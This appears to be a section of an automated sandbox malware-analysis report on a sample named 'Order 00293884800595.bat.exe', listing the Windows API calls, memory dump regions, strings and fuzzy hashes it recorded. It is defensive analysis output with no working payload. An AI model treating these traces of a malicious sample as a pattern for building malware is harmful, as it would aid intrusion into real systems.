                                                  • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                                  • GetTickCount.KERNEL32 ref: 00402EFE
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                                  • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                                  • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                                  • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                                  • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405374
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                                    • Part of subcall function 00404379: SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 0040438B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                                  • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                                  • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                                  • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,763F3410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                                                  • GlobalFree.KERNEL32(0069BC70), ref: 00403A22
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-787714339
                                                  • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                                  • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                                                  • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                                  • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order 00293884800595.bat.exe,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order 00293884800595.bat.exe,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3443045126
                                                  • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                  • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                                                  • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                  • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6CA5116B
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6CA511D8
                                                  • GlobalFree.KERNEL32(?), ref: 6CA51286
                                                  • GlobalFree.KERNEL32(00000000), ref: 6CA5129B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true
                                                  • Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID:
                                                  • API String ID: 3394109436-0
                                                  • Opcode ID: b1365357912af0dd11e1483ae74698baaaaad2ad15f4b62d1784eb78eb788dc3
                                                  • Instruction ID: f3fff5ea853af56e8b5a0c4c30671a5fd6bf408c3ab15e6d69d9893934589133
                                                  • Opcode Fuzzy Hash: b1365357912af0dd11e1483ae74698baaaaad2ad15f4b62d1784eb78eb788dc3
                                                  • Instruction Fuzzy Hash: 8151E7B5601306AFDB04CF68C984A7A7BF4FB06348BD8C469E646C7710E734E9A5CB51
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                                  • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                                  • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                                  • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                                  • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q$$~q$$~q
                                                  • API String ID: 0-2846834050
                                                  • Opcode ID: bd8ba12be93cc2b66796e4a4e26dc392c4496b44623285dfea99750ea25917d7
                                                  • Instruction ID: aeff2f550ead5e3a8e3e9e4fa5b9964ab325488c6ce7627fccf1c16573d22747
                                                  • Opcode Fuzzy Hash: bd8ba12be93cc2b66796e4a4e26dc392c4496b44623285dfea99750ea25917d7
                                                  • Instruction Fuzzy Hash: DE323131E1061ACBCB14DFB5C85459DF3B2FFD9300F61866AD419AB215EB30AD85CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q
                                                  • API String ID: 0-37811640
                                                  • Opcode ID: 7ed33a33489e35fdecfac80279f26d27d3984fe64d932ad18e4bf32f6c6b9795
                                                  • Instruction ID: f377a39f0cc61fab3f5a475eeb5ce67d8ead0178ff0b2e6d85792e1d2ba4d0c8
                                                  • Opcode Fuzzy Hash: 7ed33a33489e35fdecfac80279f26d27d3984fe64d932ad18e4bf32f6c6b9795
                                                  • Instruction Fuzzy Hash: 2C029C74B00609CFDF08DFA5D594A5EB7B2FF88340F158969E806AB385DBB1DC468B90
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24f65e0f7a5feeebf56a47aab0934273b462888892f3c1c70c8c52d281d9b6ad
                                                  • Instruction ID: 077e74d8fdf13b9182aba2ba6d4165e9ed2e0ea1bd68086797c182452cf09d26
                                                  • Opcode Fuzzy Hash: 24f65e0f7a5feeebf56a47aab0934273b462888892f3c1c70c8c52d281d9b6ad
                                                  • Instruction Fuzzy Hash: D263E831D10B1ACADB11EB68C8945A9F7B1FF99300F11D79AE4587B121EB70AAC5CF81
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c079292914770794cb553f361b22f423e8213b4619c16c9dc87c815e23c73cbc
                                                  • Instruction ID: 190f7f7a60bd6b1b0657d56b152433fe77fcebe2f74c40dc1bd3a0eee8961422
                                                  • Opcode Fuzzy Hash: c079292914770794cb553f361b22f423e8213b4619c16c9dc87c815e23c73cbc
                                                  • Instruction Fuzzy Hash: 3B92F634A00204CFDB28DB68C584A5DB7F2FB49315F5584A9E859AF361DB35ED8ACF80
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b439c1d43ff7ca27b3a094cbf497052e630d4c1b645803c54292ac078a4095a5
                                                  • Instruction ID: 1b9b689b18b606d916a9ee873e09ded2c2fd71abc877ecede817c322a8ff9e64
                                                  • Opcode Fuzzy Hash: b439c1d43ff7ca27b3a094cbf497052e630d4c1b645803c54292ac078a4095a5
                                                  • Instruction Fuzzy Hash: 8E626834B00204CFDB04DBA9D594A9DB7B2FF88350F548969E806AB395DBB5ED42CB80
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 996499d6640b688451bd1e7fd011be8b9f94190b335c11d1731f314fe0e1565a
                                                  • Instruction ID: c961a79f4945e3973e56591a85e715729251aba9ecd467ed3a946d02580f4502
                                                  • Opcode Fuzzy Hash: 996499d6640b688451bd1e7fd011be8b9f94190b335c11d1731f314fe0e1565a
                                                  • Instruction Fuzzy Hash: 7512B179F00255DBEF14EB65D880A9EB7A2FB85350F10887AD806DB385DB74EC45CB90
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8be663c59ace112cefa6083003ec5c8a1c8886ce553453826a04494785d0d0f
                                                  • Instruction ID: 5c48d70f02471f661c97a2a8c0e44e13c6c798689d7c2930a5158dda4741f646
                                                  • Opcode Fuzzy Hash: b8be663c59ace112cefa6083003ec5c8a1c8886ce553453826a04494785d0d0f
                                                  • Instruction Fuzzy Hash: 9F327C71D00719CEDB15DF68C890AAEF7B1FF99300F15C6AAD459AB251EB30E985CB80
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ea6989f379b606118a79c3fb8b98542cbb23031e5be2ea57412351c3ef20a25
                                                  • Instruction ID: cdde2d6bc3121a69de40c46899f8bb1ec9c2d1f50fdcb7a97346efaaebac31e6
                                                  • Opcode Fuzzy Hash: 3ea6989f379b606118a79c3fb8b98542cbb23031e5be2ea57412351c3ef20a25
                                                  • Instruction Fuzzy Hash: 98224D78E01109CFEF14CA69C480B9EB7B2FB89350F658D26E445EB391DB74ED818B91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdbf51f940fa76cfbda0cdfa4745536b1d1378159a972c3e1a476f9e00aa8932
                                                  • Instruction ID: 08f0c4e4c26f1ab070c161e399cd89b165bae41b48f246356281d3c9c33f0a92
                                                  • Opcode Fuzzy Hash: fdbf51f940fa76cfbda0cdfa4745536b1d1378159a972c3e1a476f9e00aa8932
                                                  • Instruction Fuzzy Hash: 2CD17F74A00205CFCB14DBA8D594AADBBB2FF88311F248469E816EB391DF35DD46CB90
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99c3871f25676ba816524cb5cf6744faf6dfbfd6758868ec5b93ad02ba8b9007
                                                  • Instruction ID: 6b9a329966dfe7a146f32e8709e00a5da340bdc6b7c09671f8560294d1477fb2
                                                  • Opcode Fuzzy Hash: 99c3871f25676ba816524cb5cf6744faf6dfbfd6758868ec5b93ad02ba8b9007
                                                  • Instruction Fuzzy Hash: C1B17070E00209CFDF14CFA9D8917ADBBF2AF49719F148529D825EB254EB749889CB81
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e3a29fed329888f316c7ad46a1d88686fac8d181c8a18ad8089dd6e464c348b
                                                  • Instruction ID: e4563c7057af5659891b79b6ee12d0300321c4551e0c93e8ca4b49aafa60dc9a
                                                  • Opcode Fuzzy Hash: 5e3a29fed329888f316c7ad46a1d88686fac8d181c8a18ad8089dd6e464c348b
                                                  • Instruction Fuzzy Hash: FB919170E00209DFDF14CFA9C8817EDBBF2AF88355F148129D865EB294EB749949CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q
                                                  • API String ID: 0-2858235012
                                                  • Opcode ID: 32df19a4e0de9e97f00728e33c0ad28ae9ac5271e7df218d8f00306246d456e8
                                                  • Instruction ID: 87f31a49f93db31cd9726c31b8f6ee7c56dc589405b3bb9b76286465cdc625bf
                                                  • Opcode Fuzzy Hash: 32df19a4e0de9e97f00728e33c0ad28ae9ac5271e7df218d8f00306246d456e8
                                                  • Instruction Fuzzy Hash: BAE15C74A00219CBDF19DBA9C490A9EB7B2FF89351F208969D806AB354DF71DC46CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q$$~q$$~q
                                                  • API String ID: 0-2846834050
                                                  • Opcode ID: 8e0d36e73c5f3f165a2b351e3881e0de1e963c5189c67440e5bede57279aa6b1
                                                  • Instruction ID: c52d93e0cc5e047c4e5022d1f6206acea125a520b95cee94bfbdc61a01d04e0c
                                                  • Opcode Fuzzy Hash: 8e0d36e73c5f3f165a2b351e3881e0de1e963c5189c67440e5bede57279aa6b1
                                                  • Instruction Fuzzy Hash: 27026C74E01209CBEF14CBAAC480A9EB7B2FB45350F608D6AD405EB355DBB1ED46CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q
                                                  • API String ID: 0-2080730351
                                                  • Opcode ID: 004a741e1a6f7aef966d9b7e620f6595e35094cb83278cd45a0c58f6216ae736
                                                  • Instruction ID: 3f28c1e1407be4aef6791b549ce6d28830383a1d57784e9ef909bde0f4f3baf9
                                                  • Opcode Fuzzy Hash: 004a741e1a6f7aef966d9b7e620f6595e35094cb83278cd45a0c58f6216ae736
                                                  • Instruction Fuzzy Hash: EB914074B0061ACBDF18DB65D890BAEB3F6FBC8340F508969C409EB344EB749D468B94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q
                                                  • API String ID: 0-835092581
                                                  • Opcode ID: 98703abf448953da8de5247c319b2f900d6f3a4235e608f4c6167c16c53f1fa9
                                                  • Instruction ID: e810a8df0c8a824549bce708901cfd018d479535d46b5d46e13f5adb927164a3
                                                  • Opcode Fuzzy Hash: 98703abf448953da8de5247c319b2f900d6f3a4235e608f4c6167c16c53f1fa9
                                                  • Instruction Fuzzy Hash: 97623770E1020ACFCB15DBA8C59194EBBB2FF85311F608A69D406AF359DB71ED46CB84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q
                                                  • API String ID: 0-37811640
                                                  • Opcode ID: 1957c885189268462b2e009c015ad76258fbd8587b18cf7862fc82c6d22d324a
                                                  • Instruction ID: 3e87fd0890bfb6c2378d0793455cd4d272fb7d45311dd40b605a446f4f8fcd4c
                                                  • Opcode Fuzzy Hash: 1957c885189268462b2e009c015ad76258fbd8587b18cf7862fc82c6d22d324a
                                                  • Instruction Fuzzy Hash: 79513074B00206CFDF48DB75D8A1BAEB3F6EBC8350F548869C406EB344EA759C468B94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR~q
                                                  • API String ID: 0-151050133
                                                  • Opcode ID: 3e29bee4c3e32791b9c918be86f32d0e1a4bf15756fca15001b0cb5ce63864fc
                                                  • Instruction ID: 32048420a0a4aa2bccc3fc717f17f6dc9e0b130d047c43efb09c98eae741415a
                                                  • Opcode Fuzzy Hash: 3e29bee4c3e32791b9c918be86f32d0e1a4bf15756fca15001b0cb5ce63864fc
                                                  • Instruction Fuzzy Hash: C2918D30B00A15CFDB14DB68C8A466E7BB2FF89711F204569E816EB3A1DB75DC49CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH~q
                                                  • API String ID: 0-41818388
                                                  • Opcode ID: 5b701f4a75ee1556439f1997b9fd2f790cdeda2a4b1fe7007dac9ddb31fb33d0
                                                  • Instruction ID: 0ffe3402ddec7f1ecb1aeb2bd00b8640e63f355338c83a083cda5df4faf5c6a7
                                                  • Opcode Fuzzy Hash: 5b701f4a75ee1556439f1997b9fd2f790cdeda2a4b1fe7007dac9ddb31fb33d0
                                                  • Instruction Fuzzy Hash: A181C075B00205CBEF08AA66D89469EB7B3FB88350F108969D806EB345DB75DD468B90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH~q
                                                  • API String ID: 0-41818388
                                                  • Opcode ID: 668cf25c3512c42c31278b05348dcc29058e664700b2bb8d1fec98d3956bec2a
                                                  • Instruction ID: 001392bf253785710993ad4d647c9029b1245104a3fbbff234ebd6268a77cd60
                                                  • Opcode Fuzzy Hash: 668cf25c3512c42c31278b05348dcc29058e664700b2bb8d1fec98d3956bec2a
